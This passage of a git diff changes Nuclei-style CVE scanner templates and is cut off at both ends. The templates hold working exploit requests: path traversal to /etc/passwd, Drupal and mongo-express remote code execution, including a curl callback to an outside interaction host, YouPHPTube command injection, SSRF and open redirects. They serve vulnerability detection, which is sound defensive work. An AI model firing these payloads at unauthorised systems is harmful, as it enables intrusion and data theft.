manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. - impact: | - Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure. - remediation: | - Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability. reference: - https://seclists.org/fulldisclosure/2019/Apr/12 - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-14918 - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/HimmelAward/Goby_POC classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-14918 cwe-id: CWE-22 - epss-score: 0.44897 - epss-percentile: 0.97077 - cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: loytec - product: lgate-902_firmware shodan-query: http.html:"LGATE-902" - tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss + verified: "true" + tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate -http: +requests: - method: GET path: - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" @@ -47,4 +35,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/07/07 diff --git a/poc/cve/cve-2018-16761.yaml b/poc/cve/cve-2018-16761.yaml index 23f9df48fa..7f0883240e 100644 --- a/poc/cve/cve-2018-16761.yaml +++ b/poc/cve/cve-2018-16761.yaml @@ -6,10 +6,6 @@ info: severity: medium description: | Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. - remediation: | - Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. reference: - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - https://github.com/eventum/eventum/releases/tag/v3.4.0 @@ -19,16 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 - cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: eventum_project - product: eventum - tags: cve,cve2018,redirect,eventum,oss,eventum_project + tags: cve,cve2018,redirect,eventum,oss -http: +requests: - method: GET path: - '{{BaseURL}}/select_project.php?url=http://interact.sh' @@ -39,5 +28,6 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by md on 2022/10/13 diff --git a/poc/cve/cve-2018-19365.yaml b/poc/cve/cve-2018-19365.yaml index 2b040cfd71..7b30433c16 100644 --- a/poc/cve/cve-2018-19365.yaml +++ b/poc/cve/cve-2018-19365.yaml @@ -1,34 +1,20 @@ id: CVE-2018-19365 - info: - name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal + name: Wowza Streaming Engine Manager Directory Traversal author: 0x_Akoko - severity: critical - description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. - impact: | - An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information. - remediation: | - Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability. + severity: high + description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request reference: - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-19365 - - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt - - https://github.com/ARPSyndicate/kenzer-templates + - https://www.cvedetails.com/cve/CVE-2018-19365 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H - cvss-score: 9.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2018-19365 cwe-id: CWE-22 - epss-score: 0.01354 - epss-percentile: 0.8589 - cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: wowza - product: streaming_engine - tags: cve2018,cve,wowza,lfi + tags: cve,cve2018,wowza,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine" @@ -43,4 +29,3 @@ http: - type: status status: - 200 -# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-7602.yaml b/poc/cve/cve-2018-7602.yaml index aa1cc6dda2..243e590b31 100644 --- a/poc/cve/cve-2018-7602.yaml +++ b/poc/cve/cve-2018-7602.yaml @@ -1,35 +1,19 @@ id: CVE-2018-7602 - info: - name: Drupal - Remote Code Execution + name: Drupal Remote Code Execution Vulnerability author: princechaddha severity: critical - description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. - impact: | - Remote attackers can execute arbitrary code on the affected Drupal installations. - remediation: | - Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal. + description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. reference: - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py - https://nvd.nist.gov/vuln/detail/CVE-2018-7602 - - https://www.drupal.org/sa-core-2018-004 - - https://www.exploit-db.com/exploits/44557/ - - http://www.securitytracker.com/id/1040754 + tags: cve,cve2018,drupal,authenticated classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-7602 - epss-score: 0.97448 - epss-percentile: 0.99947 - cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* - metadata: - max-request: 4 - vendor: drupal - product: drupal - shodan-query: http.component:"drupal" - tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb -http: +requests: - raw: - | POST /?q=user%2Flogin HTTP/1.1 @@ -37,15 +21,18 @@ http: Content-Type: application/x-www-form-urlencoded form_id=user_login&name={{username}}&pass={{password}}&op=Log+in + - | GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1 Host: {{Hostname}} + - | POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account + - | POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1 Host: {{Hostname}} @@ -53,7 +40,8 @@ http: form_build_id={{form_build_id}} - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 matchers: - type: word @@ -62,26 +50,25 @@ http: extractors: - type: regex + part: body name: userid + internal: true group: 1 regex: - '' - internal: true - part: body - type: regex + part: body name: form_build_id + internal: true group: 1 regex: - '' - internal: true - part: body -# digest: 4a0a0047304502204dec12f369a9044e8dc3ba9c641723199442f60a3736e83f89caca37cd8118b5022100cda38fa6e52e8717c3073dff9123fc3707428e477982dd4549e372892f2a082e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-7662.yaml b/poc/cve/cve-2018-7662.yaml index 4296c733cd..eb56470249 100644 --- a/poc/cve/cve-2018-7662.yaml +++ b/poc/cve/cve-2018-7662.yaml @@ -1,42 +1,25 @@ id: CVE-2018-7662 info: - name: CouchCMS <= 2.0 - Path Disclosure + name: CouchCMS Full Path Disclosure author: ritikchaddha severity: medium - description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. - impact: | - An attacker can exploit this vulnerability to gain knowledge of the server's directory structure, potentially aiding in further attacks. - remediation: | - Upgrade to the latest version of CouchCMS (2.1 or higher) to mitigate this vulnerability. - reference: - - https://github.com/CouchCMS/CouchCMS/issues/46 - - https://nvd.nist.gov/vuln/detail/CVE-2018-7662 - - https://github.com/20142995/Goby - - https://github.com/5ecurity/CVE-List - - https://github.com/ARPSyndicate/cvemon + description: phpmailer.php and mysql2i.func.php disclosure the full path + reference: https://github.com/CouchCMS/CouchCMS/issues/46 + tags: couchcms,fpd,cve,cve2018 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2018-7662 cwe-id: CWE-200 - epss-score: 0.00292 - epss-percentile: 0.65908 - cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: couchcms - product: couch - tags: cve2018,cve,couchcms,fpd -http: +requests: - method: GET path: - "{{BaseURL}}/includes/mysql2i/mysql2i.func.php" - "{{BaseURL}}/addons/phpmailer/phpmailer.php" stop-at-first-match: true - matchers-condition: or matchers: - type: word @@ -52,4 +35,3 @@ http: - "phpmailer.php on line 10" - "Fatal error: Call to a menber function add_event_listener() on a non-object in" condition: and -# digest: 490a0046304402207bc6bc4a86c8bf73bc4bc1fe83c3fb63108f1b1b77ac110b33a6af75a7a3a8ad02203036732893f9ba2208c741cd3a825d7d73f9870d11029f0c14d7098e0bc302cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-9161.yaml b/poc/cve/cve-2018-9161.yaml index d3295f40cc..5db121e528 100644 --- a/poc/cve/cve-2018-9161.yaml +++ b/poc/cve/cve-2018-9161.yaml @@ -4,31 +4,18 @@ info: name: PrismaWEB - Credentials Disclosure author: gy741 severity: critical - description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. - impact: | - An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data. - remediation: | - Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. + description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 - - https://www.exploit-db.com/exploits/44276/ - - https://github.com/ARPSyndicate/kenzer-templates + tags: cve,cve2018,prismaweb,exposure classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-9161 cwe-id: CWE-798 - epss-score: 0.12574 - epss-percentile: 0.95318 - cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: prismaindustriale - product: checkweigher_prismaweb - tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale -http: +requests: - method: GET path: - "{{BaseURL}}/user/scripts/login_par.js" @@ -45,4 +32,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ffcd63af862f8b9aa24f999ad152b190ff12a716891947bdfcdf6f8928420413022006b1c871ad6ce93fb773c74b29e916effe0a6cb129653f58c5c4eb406cccfe6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-10758.yaml b/poc/cve/cve-2019-10758.yaml index 92d6c6e83f..9ce3a78eca 100644 --- a/poc/cve/cve-2019-10758.yaml +++ b/poc/cve/cve-2019-10758.yaml @@ -4,32 +4,20 @@ info: name: mongo-express Remote Code Execution author: princechaddha severity: critical - description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. - remediation: Upgrade mongo-express to version 0.54.0 or higher. + description: "mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment." reference: - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 - - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215 - - https://github.com/CLincat/vulcat - - https://github.com/MelanyRoob/Goby + remediation: Upgrade mongo-express to version 0.54.0 or higher. + metadata: + shodan-query: http.title:"Mongo Express" classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.9 + cvss-score: 9.90 cve-id: CVE-2019-10758 - epss-score: 0.97429 - epss-percentile: 0.99934 - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* - metadata: - max-request: 1 - vendor: mongo-express_project - product: mongo-express - framework: node.js - shodan-query: http.title:"Mongo Express" - tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js + tags: cve,cve2019,mongo,mongo-express -http: +requests: - raw: - | POST /checkValid HTTP/1.1 @@ -37,11 +25,11 @@ http: Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded - document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}") - + document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}") matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a004830460221008b43b36836d54fe57119d7fbc9c2c7bbf83a5c28c40a75eb6347457778a45bc6022100fe8bb104228123301a28b551a1badd14112e0aa18bce53387295571b79c7b827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/29 diff --git a/poc/cve/cve-2019-17503.yaml b/poc/cve/cve-2019-17503.yaml new file mode 100644 index 0000000000..a3b8e66c08 --- /dev/null +++ b/poc/cve/cve-2019-17503.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-17503 + +info: + name: Kirona Dynamic Resource Scheduling - information disclosure + author: LogicalHunter + severity: medium + description: An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly _ it contains sensitive information about the database through the SQL queries within this batch file + reference: + - https://www.exploit-db.com/exploits/47498 + - https://nvd.nist.gov/vuln/detail/CVE-2019-17503 + tags: cve,cve2019,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-17503 + cwe-id: CWE-425 + +requests: + - method: GET + path: + - "{{BaseURL}}/osm/REGISTER.cmd" + - "{{BaseURL}}/osm_tiles/REGISTER.cmd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "DEBUGMAPSCRIPT=TRUE" + - "@echo off" + condition: and diff --git a/poc/cve/cve-2019-5127.yaml b/poc/cve/cve-2019-5127.yaml new file mode 100644 index 0000000000..07c1505179 --- /dev/null +++ b/poc/cve/cve-2019-5127.yaml @@ -0,0 +1,47 @@ +id: CVE-2019-5127 + +info: + name: YouPHPTube Encoder RCE + author: pikpikcu + severity: critical + description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917 + tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-5127 + cwe-id: CWE-78 + +requests: + - method: GET + path: + - "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" # CVE-2019-5127 + - "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5128 + - "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5129 + headers: + Content-Type: application/x-www-form-urlencoded + - method: GET + path: + - "{{BaseURL}}/objects/nuclei.txt" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + condition: and + part: body + + - type: word + words: + - text/plain + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-6715.yaml b/poc/cve/cve-2019-6715.yaml new file mode 100644 index 0000000000..16bbedcfc0 --- /dev/null +++ b/poc/cve/cve-2019-6715.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-6715 + +info: + name: CVE-2019-6715 + author: randomrobbie + severity: high + description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF + tags: cve,cve2019,wordpress,wp-plugin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-6715 + reference: + - https://vinhjaxt.github.io/2019/03/cve-2019-6715 + - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html + +requests: + - raw: + - | + PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"} + + matchers: + - type: word + words: + - "TmVzc3VzQ29kZUV4ZWNUZXN0" + part: body \ No newline at end of file diff --git a/poc/cve/cve-2020-10547.yaml b/poc/cve/cve-2020-10547.yaml index 3585b75926..445f4d31d4 100644 --- a/poc/cve/cve-2020-10547.yaml +++ b/poc/cve/cve-2020-10547.yaml @@ -1,12 +1,18 @@ -id: cve-2020-10547 +id: CVE-2020-10547 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. - reference: https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py + reference: + https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10547 + cwe-id: CWE-89,CWE-522 requests: - method: GET diff --git a/poc/cve/cve-2020-12447.yaml b/poc/cve/cve-2020-12447.yaml index 941f7e0b40..5d68fba753 100644 --- a/poc/cve/cve-2020-12447.yaml +++ b/poc/cve/cve-2020-12447.yaml @@ -1,40 +1,27 @@ id: CVE-2020-12447 - info: name: Onkyo TX-NR585 Web Interface - Directory Traversal author: 0x_Akoko severity: high - description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. - impact: | - An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation. - remediation: | - Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability. + description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal reference: - https://blog.spookysec.net/onkyo-lfi - - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 - - https://blog.spookysec.net/onkyo-lfi/ - - https://github.com/ARPSyndicate/kenzer-templates + - https://www.cvedetails.com/cve/CVE-2020-12447 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12447 cwe-id: CWE-22 - epss-score: 0.01711 - epss-percentile: 0.8752 - cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: onkyo - product: tx-nr585_firmware tags: cve,cve2020,onkyo,lfi,traversal -http: +requests: - method: GET path: - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" @@ -42,4 +29,3 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100927c1a44689d7680e0dee3d0c8c5daf8e08fd834eb2fbb5cfea86f3a531c00b9022100c9621cde469f6eace4647eeeb2c70aeea221843a6410e3c169dd9a1f9d162936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-15050.yaml b/poc/cve/cve-2020-15050.yaml index e51ec40239..c3a0c4953d 100644 --- a/poc/cve/cve-2020-15050.yaml +++ b/poc/cve/cve-2020-15050.yaml @@ -1,34 +1,21 @@ id: CVE-2020-15050 info: - name: Suprema BioStar <2.8.2 - Local File Inclusion + name: Suprema BioStar2 - Local File Inclusion (LFI) author: gy741 severity: high - description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion. - impact: | - An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. - remediation: | - Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability. + description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal. reference: - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html - https://www.supremainc.com/en/support/biostar-2-pakage.asp - https://nvd.nist.gov/vuln/detail/CVE-2020-15050 - - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.50 cve-id: CVE-2020-15050 - cwe-id: CWE-22 - epss-score: 0.55214 - epss-percentile: 0.97597 - cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: supremainc - product: biostar_2 - tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc + tags: cve,cve2020,lfi,suprema,biostar2 -http: +requests: - method: GET path: - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini" @@ -41,4 +28,3 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a00463044022027582fd4cb0e0721dcad8ad6dedd262cd3be8b49cf72e43e17a2d9945178024a02205c1ba847b18c648f8f13e7cd4e6e20f76079e24b2801869c1f78c3d40cc310ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-18268.yaml b/poc/cve/cve-2020-18268.yaml index ba4395254f..033c62e51b 100644 --- a/poc/cve/cve-2020-18268.yaml +++ b/poc/cve/cve-2020-18268.yaml @@ -1,34 +1,21 @@ id: CVE-2020-18268 info: - name: Z-Blog <=1.5.2 - Open Redirect + name: Z-BlogPHP 1.5.2 Open redirect author: 0x_Akoko severity: medium - description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. - remediation: | - Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability. + description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php." reference: - https://github.com/zblogcn/zblogphp/issues/216 - - https://github.com/zblogcn/zblogphp/issues/209 - - https://nvd.nist.gov/vuln/detail/CVE-2020-18268 - - https://github.com/ARPSyndicate/kenzer-templates + - https://www.cvedetails.com/cve/CVE-2020-18268 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-18268 cwe-id: CWE-601 - epss-score: 0.00147 - epss-percentile: 0.49792 - cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: zblogcn - product: z-blogphp - tags: cve,cve2020,redirect,zblogphp,authenticated,zblogcn + tags: cve,cve2020,redirect,zblogphp,authenticated -http: +requests: - raw: - | POST /zb_system/cmd.php?act=verify HTTP/1.1 @@ -38,13 +25,14 @@ http: Connection: close btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 + - | - GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2 + GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2 Host: {{Hostname}} + cookie-reuse: true matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100bd3922005e2f1f83e8fc6d03ed0821320876192c346fd423f1e365de6eecda67022007afefdc8787c536742bd021c8c77fecf9c9783282077289ed30c3e2ee522665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2020-26876.yaml b/poc/cve/cve-2020-26876.yaml index 6559ee1788..2fdc04789f 100644 --- a/poc/cve/cve-2020-26876.yaml +++ b/poc/cve/cve-2020-26876.yaml @@ -1,32 +1,41 @@ id: CVE-2020-26876 + info: name: WordPress WP Courses Plugin Information Disclosure author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. - tags: wordpress,plugin reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-26876 - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + - https://plugins.trac.wordpress.org/changeset/2388997 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2020-26876 + cwe-id: CWE-306 + tags: cve,cve2020,wordpress,wp-plugin,exposure,edb + requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/lesson/1" + matchers-condition: and matchers: - type: regex + part: body regex: - "rest_post_invalid_id" - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - part: body + - type: word + part: header words: - "application/json" - part: header + - type: status status: - 200 diff --git a/poc/cve/cve-2020-27866.yaml b/poc/cve/cve-2020-27866.yaml index 